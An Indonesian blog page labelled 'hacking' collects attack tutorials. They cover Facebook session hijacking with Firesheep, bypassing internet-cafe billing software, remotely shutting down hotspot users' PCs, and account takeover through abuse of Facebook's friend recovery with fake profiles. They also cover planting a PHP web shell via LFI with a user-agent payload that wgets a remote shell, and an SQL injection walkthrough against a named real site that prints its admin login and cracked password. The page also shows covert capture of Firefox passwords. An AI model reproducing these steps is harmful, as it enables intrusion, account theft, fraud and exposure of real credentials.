This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Tampilkan postingan dengan label hacking. Tampilkan semua postingan
Tampilkan postingan dengan label hacking. Tampilkan semua postingan

Rabu, 01 Agustus 2012

Cara Mudah Membobol Administrator Windows XP

Rabu, 04 Juli 2012

Menyisipkan Shell PHP ke Image

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Selasa, 19 Juni 2012

BAGAIMANA CARA HACK ACCOUNT FACEBOOK

Oke ini di mulai dengan banyaknya pertanyaan mengenai cara hacking account facebook, twitter, dll.
perlu di ketahui bahwa semua itu tidak menunjukkan kalo kalian hacker.
cobalah untuk berpikir kritis dan jangan hanya ingin yang instan meskipun disini saya akan menjelaskan salah satu cara hacking facebook, twitter,dll tersebut..
tapi ingatlah.. jangan sekali2 tanyakan pada orang termasuk di forum ini mungkin "BAGAIMANA CARA HACK ACCOUNT FACEBOOK"
atau dengan kata lain.. "KAKAK AJARI SAYA CARA HACKING FACEBOOK" dengan wajah yang memelas dan dengan harapan ada yang membantu kalian untuk kepentingan kalian sendiri cuman kalian pengen di anggap "Hacker" oleh facebook teman kalian yang berhasil di hack

it's not our way..
yang terpenting adalah ilmu bukan anggapan bahwa kalian adalah hacker..



cukup basa-basinya.. lanjut ke konteks tutorial..
Bagi yang sudah tahu silahkan lewaaaat juga tidak apa-apa..

cara hacking facebook yang akan saya tulis ini adalah dengan menggunakan addons FIRESHEEP. Firesheep merupakan add-on firefox yang bisa digunakan untuk hacking facebook. Firesheep ini buatan Eric Butler, seorang freelance web aplikasi dan pengembang perangkat lunak. Sebenarnya firesheep ini bertujuan untuk mengantisipasi kurangnya keamanan user login dan cookie pada web-web populer seperti facebook. Sebenarnya Firesheep bukan hanya digunakan untuk facebook saja tapi banyak website populer lainnya seperti cookies dari Amazon.com, Basecamp, bit.ly, Cisco, CNET, Dropbox, Enom, Evernote, Flickr, Github, Google, HackerNews, Harvest, Windows Live, NY Times, Pivotal Tracker, Slicehost, tumblr, Twitter, WordPress, Yahoo, Yelp

Firesheep ini merupakan software opensource yang bisa anda download di http://codebutler.github.com/firesheep/ dan jangan lupa bagi anda pengguna windows untuk memasang winpcap terlebih dahulu. Setelah anda mendownload dan menginstall firesheep dan anda sedang berselancar ria di jaringan wifi yang gratis misalnya di cafe. maka akan muncul sebuah sidebar baru yang menampilkan user-user yang sedang login ke sebuah web sebagai contoh adalah Facebook. Jika pengguna wifi ada yang login ke facebook dan tampil di sidebar anda, maka anda hanya butuh mengklik 2 kali dan anda sekarang bisa login sebagai dia tanpa harus memasukkan username dan password lagi.

Untuk cara menggunakan firesheep, tinggal tekan Ctrl + Shift + S pada keyboard. maka secara otomatis akan muncul Sidebar di firefox anda. Kemudian klik tombol Start Capturing. Jika berhasil, maka akan muncul beberapa facebook orang-orang yang sedang online di kawasan hotspot anda.



untuk mengantisipasinya tinggal kita gunakan backsheep..
kebalikan dari firesheep fungsinya.. silahkan di mengerti

dengan adanya tutorial ini semoga muncul kesadaran bahwa sebenarnya hacking itu luas dan yang terpenting adalah proses dan ilmu yang kalian dapatkan.. majulah "undergrond" Indonesia dan majulah IT indonesia

sekian dari saya,

regrads,


hakz

thanks to : deadc0de team buat videonya..

Sabtu, 02 Juni 2012

Menyembunyikan File di balik foto

Sabtu, 20 Agustus 2011

Hack CyberBilling

Oke langsung saja kita mulai ya!!
1. Mematikan Proses Cyber Billing dengan Hijackthis
Sebenarnya untuk mematikan proses Cyber Billing g harus pake Hijackthis, tapi juga bisa pake software pengganti Task Manager yg lain. Tapi gw memakai hijackthis karna software ini cukup lengkap fiturnya. Oke, sebelum gw menjelaskan langkah-langkahnya, gw mau menjelaskan proses yang dijalankan oleh Cyber Billing, ada dua yaitu CyberClient dan Services, yang mana CyberClient berfungsi untuk menjalankan client Cyber Billing di Komputer tsb, sedangkan Services berfungsi untuk mengecek apakah CyberClient masih berjalan atau tidak. Apabila Services menemukan CyberClient tidak aktif, maka Services akan otomatis merestart komputer.
Jadi, untuk mematikan proses CyberClient, kita harus mematikan Servicesnya dahulu, yaitu dengan memakai Hijackthis, jalankan Hijackthis, klik Do a Scan Only, klik Config, pada bagian Configuration pilih Misc Tools, klik Run, Ketik Services.msc, selanjutnya pada Services.msc klik kanan CyberBilling Protection pilih stop.
Image
Selanjutnya close services.msc pada Misc Tool Hijackthis pilih proses CyberClient.exe klik Kill Process, maka proses Cyber Billing akan berhenti dan ente bias main sepuasnya.
2. Speed Hack Cyber Billing
Klo bahasan yang diatas sepertinya terlalu kasar, maka pada bagian yg kedua ini kita tidak akan mematikan proses billingnya, tapi Cuma membuat proses Billing itu berjalan lambat. Untuk bisa mewujudkan itu, kita bisa menggunakan Cheat Engine (Software untuk menciptakan Cheat pada Game), silahkan jalankan cheat enginenya, selanjutnya klik icon bergambar komputer, dan pada bagian process list, pilih proses CyberClient.exe, klik OK.
Image
Selanjutnya Check pada Enable Speedhack dan isikan nilainya Pada Speed (standar nilainya 1.0), jadi klo kita mau memperlambat proses penghitungan waktunya nilainya bisa kita ubah menjadi lebih kecil dari 1.0 (misalkan 0.5).dan, wakaka, selamat anda sudah bisa bermain 2 jam dengan hanya membayar 1 jam. No One Knows Me
http://dedesaputra.do.am

mematikan laptop orang di area hotspot

sebenarnya sih udah jadul banget tapi mau share aja ah

n please jangan di pake buat nakal yah 
matiin kompi orang di area hotspot memakai windows shutdown.exe

1. scan alamat ip mengunakan ipscanner(terserah apa aja yang penting dapet ip  )

2.setelah dapat lit dulu ip kamu takutna senjata makan tuan(soalnya udah pernah kena sendiri  )
3. buka CMD (command buttton) ketik shutdown.exe -i -m tyuz di enter

Image

4. masukin alamat IP yang tadi udah dapet
5. pilih yang akan dilakukan (restart,shutdown dll)
jangan lupa tinggalin pesan box yang di paling bawah
6. klik ok

-xcode

Sabtu, 23 Juli 2011

Nokia Unlock code

Nokia Mobile Unlock code generator unlocks the Nokia cell phones and help us to use any service provider we want. This application will generate network unlock codes for your mobile phone which you simply enter into the phone keypad to unlock your phone to all networks.
hack nokia phone, nokia mobile hacks
Nokia Mobile Unlock code generator

Nokia Free unlock codes calculator  allow users to use their mobile phone with any service provider around the world.

It helps in Repairing, removing  SIM restrictions and unlocking Nokia, Samsung, Siemens, Maxon, NEC, Sony, Panasonic, Vitel, AEG / Telital, Alcatel cellphones.


How to use Nokia mobile Unlock code generator:
1. Remove your sim card and switch on the phone.
2. Type *#06# to get phone serial number and enter this into the program along with your phone model number and current network.
3. Extract and Install the Nokia Phone manager. The click on Nokia Free Unlock.exe(by default C:\Program Files\NokiaFREE Unlock Codes Calculator) to start it.
4.  Now select your Mobile model(If not found select DCT2 or DCT3 or DCT4 accordingly).
5. Now Enter your IMEI number in the IMEI box.
6. Click on calculate button and you will receive a list of unlock codes
    (I usually find that either the first or last code works fine)

7. Now you have the list of codes, enter the code into your phone (use the * key for the pw+ characters)


8. Your phone will say something like 'sim restrictions lifted' and then reboot itself


That's it you can now use any sim card in your phone.

New!! Hacking Facebook Account 100% work

I am going to teach you Hacking Facebook account passwords, i have already explained Hacking Facebook accounts or password using keyloggers and Phishing but this is absolutely manual method to hack Facebook password and its 500% working...Did you got  a shock if not, then you will get after reading this article. Facebook is adding more and more features to attract users but when you develop something that's for sure you will introduce new loopholes. Today i will explain you how to hack a Facebook account password just by utilizing recovery password loophole. These novice coders think that they have made secured features but they really doesn't their daddy is sitting outside. By today's hacking method i can give guarantee to you that you can hack anyone's Facebook account in less than 5 minutes and its 100% working hack and i have used it more than 100 times. I always tell things little bit late as i always love to enjoy the fancy of new loops..:P... This hack method is without using any tools...

Requirement to hack someone's Facebook account:
1. Victim (whose Facebook account password you wanna hack) should be on Facebook.
2. Create four to five fake Facebook accounts(three are sufficient but one more for bonus). I will advice you that create accounts with girl names and put an awesome girls photograph. Fill the basic profile.. Why i am saying create account with Girl names is just because Hungry boys accepts girls friend request without any delay. And if you know the person personally then create account with names of his near ones and say that you have created new profile so add you as a friend. Note all the three to four fake accounts should not be friends or any relationship with each other.
3. Most important requirement you need to add all above three account to the friends list of victim whose Facebook account you want to hack. Above method will be helpful for that :P.
3. At least two web browsers. So that one can be used as recovery purpose and one for viewing codes.

So guys i hope you all are clear with requirements to hack Facebook account password. Now lets hack someone's  Facebook account password practically to show that hacking Facebook account really works.
Steps to hack any Facebook account password in less than 10 minutes 100% working hack with practical example:  
In these steps i am hacking the Facebook account password of user whose email ID is ajay2008singh@gmail.com (its mine own account but fake one that i use for testing hacks).
1. Open the Facebook in your web browser. 
2. Now Click on Forgot your password? Now a new tab will open something like this. In the email box give the email ID 'ajay2008singh@gmail.com' and press enter or click on search button as shown in below snapshot..
Learn How to hack Facebook account password
Learn How to hack Facebook account password Snapshot 1
3. Now after Clicking on search you will get an Captcha verification. Type the words displayed and press enter.
4. Now You have reached to the screen Where Facebook gives the search results of the identity of previous step. There you will see button saying "This is my account" just click on that as shown below in snapshot:
Facebook account password hacking
Hacking Facebook account password snapshot 2
5. Now you have reached to the below Facebook password recovery screen as show below:
How to hack Facebook account password
Hack Facebook Password recovery snapshot 3

Now Click on "No Longer have access to these?" hyperlink to go to next step.

6. Ahhah... It sounds great everything going smoothly... So friends after following step 5 you will reach below page that ask you Enter your new email ID for contact. Its most important as password reset request after submitting codes will be received on this.. Below is snapshot of screen 4:
Hacking Facebook account password
How to hack facebook account or passwords snapshot 4

7. After submitting you will have either of two situations:
a. First One will be recover your account with friends.
b. Answer the security question if victim has set the security question.

Now what...

Oops.. he has set the security question and i dont know the answer... What should i do??.....Scared ... nopes...worried... nopes... Let's enter wrong answer to his security question three times... Omg... WTF has happened I am redirected to the First option " Recover your account with your friends" .. :P .. I love explain things in dramatic manner so that reader also get interest. :P

8. Now you are at screen saying " Recover your password using your friends" as shown below in snapshot.
Facebook account hacked
100% working practical facebook account password hack snap 5
9. Just click on continue and select the three trusted friends :P The three fake accounts that we have created for him to hack his account....:P.. 
You can also perform this hack by making your friends participate to hack someones account...Now select three accounts one by one as one... Below is the screen shot showing that i have selected three friends whom i am sending codes.
Facebook account password hacking
Facebook account hacking final snapshot
 10. Foow....Oops.. I got all the three codes....Below is the screen where you will enter those three codes that you have received...
successfully hacked facebook password
Filling confirmation codes for hacking facebook account

So guys we are done.... Fill the codes into boxes that you have received into you messages in Facebook and on email if feed is subscribed.

Click on submit now it will ask you to validate your email account that you have filled in Step number 6. That email should be genuine as you will receive recovery email on that email account only...

That finishes my Practical example with complete clear snapshots to hack Facebook account password..

I hope you all have enjoyed this hacking guide.... If you have any queries ask me in form of comments... And friends please comment if you like it...

Jumat, 24 Juni 2011

Tanam Shell via LFI dengan Metode Proc/Self/Environ

Dalam tutorial hacking kali ini saya akan coba mengimplementasikan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ, hal ini telah dibahas  sebelumnya di website milw0rm pada paper ke 361.
Ok kita langsung saja…
1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.
contoh : http://site.com/info.php?file=news.php
2. coba kita ganti “news.php” dengan “../../../”.
contoh : http://site.com/info.php?file=../../../
lalu kita mendapat error, seperti berikut…
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.
contoh : http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
bagaimana jika kita naikan directorynya ?
mari kita coba…
contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd
Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”
contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ
Jika anda mendapatkan yang seperti ini :
DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80
Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD
4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=../../../../../../../../../proc/self/environ”
lalu pada user-agent isikan dengan kode berikut :
<?system(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>
atau
<?exec(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>
lalu submit.
5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.
http://www.site.com/shell.php
happy hacking !

Senin, 06 Juni 2011

Tutorial SQL Injection

SqLi Tutorial – Sql Injection Tutorial – Sql Injection Artikel – SQL Injection Article
Sqli (alias Sql Injection atau Structured Query Language Injeksi) adalah langkah pertama dalam entri untuk memanfaatkan atau hacking website. Hal ini mudah dilakukan dan merupakan titik dari awal yang bagus. Sayangnya tutorial yang sedikit rumit sehingga itulah sebabnya ane menulis ini. Sqli pada dasarnya hanyalah suntikan pertanyaan ke dalam database atau menggunakan query untuk mendapatkan bypass otorisasi sebagai sebuah admin.

Untuk Mencari Inject
Mencari SQLI sangat mudah,semua yang perlu ente2 lakukan adalah Googling . Hal pertama yang perlu ente2 lakukan adalah menemukan beberapa dorks
Code:

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:read.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: mysql_num_rows()

Lebih lengkap, silakan dicari di Google Dorknya :)

PART 1

Pilih salah satu dorks dan menambahkan inurl: sebelum
(Jika mereka belum memiliki itu) dan kemudian salin dan sisipkan
ke google. Pilih salah satu situs dari google dan chek 1-1.
Sebagai contoh url dari halaman ente berada mungkin terlihat seperti ini
Code:

http://www.example.com/index.php?id=3

untuk memeriksa adanya Bug MySQL tinggal tambahin “‘” di akhir URL
contoh
Code:

http://www.example.com/index.php?id=3'

tekan enter sampai ente2 mendapatkan ERROR
Mendapatkan Jumlah Kolom
Setelah ente menemukan situs yg udah di siapin ,langkah pertama yang perlu ente2 ambil adalah
untuk menemukan jumlah kolom. Cara termudah untuk melakukannya adalah
menggunakan pernyataan “order by”. Yang harus ente lakukan adalah meletakkan ORDER BY (angka) -
pada akhir url ente. Jadi seharusnya terlihat seperti ini.
Code:

http://www.example.com/index.php?id=3 ORDER BY (number)--

setelahnya ane ubah jadi bahasa inggris dah..
capek translatenya
wkwkwkwkwkwkwkwkwkw :P
Yuk kita lanjutkan ke order by 8– kamu akan mendapatkan sebuah error. Ini membuktikan bahwa table database hanya memiliki 7 kolom, ini dibuktikan bahwa ketika anda melakukan order by lebih dari 7, akan selalu error. Jika kamu memiliki memory yang kurang baik, silakan buka notepad & catat kolom-kolom yang anda temukan.
Menemukan kolom yang dapat di akses

Setelah kita mengetahui kolom yang ada di table database, sekarang kita akan mencari informasi & data apa yang bisa diambil dari sana.
Kita melakukan hal tersebut dengan menggunakan fungsi “UNION” “SELECT” dan NOMOR KOLOM. Kita selipkan seluruhnya dalam URL, seperti contoh berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Jangan lupa untuk menyisipkan tanda “-” sebelum code dimulai, jadi sebagai contoh di atas kita selipka tanda “-” didepan angka “3“, nah setelah semua dilakukan, maka akan muncul table yang memiliki isi didalamnya. Catatlah nomor kolom table yang memiliki informasi di dalam database tersebut. Klo lupa, simpan dulu di notepad.
Finding MySQL Database Version
Sebelum kita melanjutkan hal ini, maka yang perlu kita ketahui adalah versi dari database.
URL nya adalah sebagai berikut:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--

Kita ganti angka “1” dengan  “@@version” untuk mengetahui informasi versi database, berikut contohnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--

Tekan enter, maka anda akan menemukan informasi database yang digunakan.
Hal ini biasanya bekerja pada versi database 5.* keatas.
Finding Database Names

Selanjutkan kita akan inject website untuk menemukan database names. Kita lakukan hal ini dengan mengganti “@@version
dengan “group_concat(schema_name)” dan juga ditambahkan “+ from+information_schema.schemata–” sesudah nomor kolom terakhir di table database.
Seperti ini contoh URLnya:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--

Hal tersebut akan menunjukkan daftar nama database. Sekarang untuk menemukan database mana yang saat ini dipakai adalah dengan mengganti “group_concat(schema_name)” dengan concat(database()) dan hapus “+ from+information_schema.schemata
Jadi URL nya akan menjadi seperti ini:
Code:

http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--

Selamat, anda telah mendapatkan informasi database yang saat ini digunakan.
Menemukan Nama Table

Untuk mengetahui nama table yang digunakan dalam database, anda harus mengganti “concat(database())” dengan group_concat(table_name) dan tambahkan “from information_schema.tables where table_schema=database()” diantara nomor awal dan “–” hapus juga tanda “+” dari “union select“.
Urlnya akan tampak seperti berikut:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--

Nah, hal tersebut akan menampilkan nama table yang digunakan di database.
Menemukan Nama Kolom

Lakukan dengan hanya merubah “table_name” ke “column_name” dan “information_schema.tables” ke “information_schema.columns”.
Url akan tampak seperti ini:
Code:

http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--

Hal tersebut akan memunculkan nama table.
Misalkan nama colom seperti berikut:
admin_username
admin_password
Mengambil Informasi Database
Sekarang kita sudah mengetahui “database name, table names, dan colomn names”, kita bisa menyatukannya bersama-sama dan mengeluarkan informasi yang ada di sana, kita lakukan dengan contoh berikut:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--

Sekarang ganti “columnname” dengan kolom yang anda mau ambil informasinta. “0x3a” akan membuat jeda diantara informasi yang anda dapatkan dari masing-masing colom. Jangan lupa juga untuk merubah “databasename.tablename” dengan database dan nama tabel dimana kolom ada di database dan tabel tersebut.
Sebagai contoh:
Code:

http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--

Sekarang anda akan mendapatkan informasi username & database
Credit: Madun & Diperbaiki Oleh BinusHacker Team

PART 2

Mari kita coba praktekkan cara diatas!
Sebagai contoh kita mendapatkan target sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30
Sekarang kita akan melakukan pengecekan apakah website tersebut memiliki vulnerability dengan menambahkan tanda di akhir URL, contohnya sebagai berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30'
Jika kita menemukan error, maka terdapat vulnerability di website tersebut, sebagai contoh:

Setelah kita mengetahui ada vulnerability, maka langkah selanjutkan adalah kita harus mengetahui berapa jumlah kolom yang ada di table tersebut.
Kita akan mengetahuinya sampai ada informasi “Unknown Column“.
Lakukan pengecekan dengan menggunakan perintah “order by“.
Kita akan mencoba dari 1……..tak hingga, jadi bisa saja 1,2,3,4,5,6,7,dst.
Kebetulah dalam target ini hanya terdapat 7 kolom dalam table yang ada di database,
Contohnya:

Langkah pengetesannya adalah
Code:
http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column

http://www.cocobod.gh/news_details.php?id=30 order by 8– *>> Unknown column
Hal tersebut membuktikan bahwa tidak ada kolom ke 8 dalam table tersebut, jadi cuman ada 7 kolom.

Langkah selanjutnya adalah, mencari kolom yang dapat di akses!

Kita sudah mengetahui, jumlah kolom adalah 7, kita gunakan perintah “UNION SELECT number,of,columns–” untuk mengatahui kolom mana yang dapat di akses:
Code:



http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--

Anda akan menemukan seperti gambar berikut:


Binus Hacker Tutorial
Muncul 6, 2, 3 kan? Kolom dalam tersebutlah yang bisa anda akses dan anda ambil informasinya.


Langkah selanjutnya, mencari informasi versi database


SQL Injection bekerja baik pada versi 5.* ke atas, untuk mendapatkan informasi database version, kita masukkan saja “@@version”, pada kolom dimana saja yang bisa dipakai.
Misalkan kolom “6″ kita ganti dengan “@@version”



Code:

http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--

Binus Hacker Tutorial

Akan muncul versi database 5.1.39, ini berarti database bisa di inject :)

Mengetahui Database Name


Langsung ajah kita replace kolom yang tadi digunakan “6,2,3″ dibagian mana saja, kita gunakan kolom “6″, kita ganti dengan code berikut “group_concat(schema_name)” , dan jangan lupa tambahkan “from information_schema.schemata–” sesudah kolom terakhir.

Code:


http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Binus Hacker Tutorial
Mengatahui Database Yang Dipakai
Langsung ajah ganti “group_concat(schema_name)” dengan “concat(database())” seperti contoh berikut:
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--
Binus Hacker Tutorial
Selamat, anda telah mengetahui database yang dipakai saat ini adalah “cocobod_gh“.
Mengetahui Nama Tabel

Langsung aja ganti “group_concat(table_name)” dan tambahkan “from information_schema.tables where table_schema=database()–” setelah kolom terakhir.
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--
Binus Hacker Tutorial
Mengatahui Nama Kolom

Untuk mengetahui nama kolom, kita gunakan query berikut:
group_concat(column_name)
from information_schema.columns where table_schema=database()–
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
Binus Hacker Tutorial
Mengambil Informasi Yang Ada Di Dalam Kolom

Ini adalah step akhir, dimana anda akan mendapatkan informasi mengenai isi dari kolom yang berada dalam table di database.
Eksekusi perintah berikut:
Code:
http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--
Exploit akan menjadi seperti berikut :
Code:
http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--
Binus Hacker Tutorial
Dari informasi di atas kita mendapatkan data: “comaster:2c39e3769d300f7e23f8a9e1e21773e7 ,
Silakan check ke MD5 decrypter untuk mendecrypt password -> http://www.md5decrypter.co.uk/ paste MD5 password yang tadi yaitu: “2c39e3769d300f7e23f8a9e1e21773e7“, anda akan medapatkan result seperti dibawah:

Binus Hacker Tutorial
comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682
username : comaster
password : cocoadmin4682

Selamat, anda sudah bisa login ke page dengan user & password di atas :)

Credit: Easy|Hack & Revision By BinusHacker Team

Jumat, 13 Mei 2011

Simpan Password otomatis di Firefox

Berikut ini saya akan menjelaskan cara agar mozilla firefox anda menyimpan password facebook, email, paypal, dll secara otomatis,mauuuu bosss  ..!!!!!   
Setiap kita log in menggunakan browser firefox, biasanya akan muncul pesan berikut :

Jika kita mengklik remember / ingat,maka password tersebut akan tersimpan otomatis...
Cara untuk melihat pasword yang tersimpan di firefox yaitu,klik menu :
Tools - Option - Security - Saved Password - Show Saved Password.
(alat - pengaturan - keamanan - kata sandi tersimpan - tampilkan kata sandi)
kelihatan semua kan tuh pasword + email / username si bosss..
Tapi cara yg saya akan jelaskan adalah bagaimana cara agar pasword otomatis tersimpan di mozilla firefox tanpa kita klik "remember / ingat".
Begini caranya :...
1. Download file ini, klik  

Photobucket
2. Ekstrak dulu file yang telah didownload menggunakan Winrar
3. Buka windows explorer
4. Letakan file tadi di folder C://Program Files/Mozilla Firefox/components
5. Ok saja kalu ada peringatan
6. Restart, beres dech bosss..
Trus setelah di simpan gimana cara liat passwordnya????
Gampang
klik pada tab Tools > Setting > Pilih tab Security > Klik tombol Saved Password dan....
wowwww.... ada kumpulan username sama situsnya... 
lalu dimana passwordnya????
Gampang
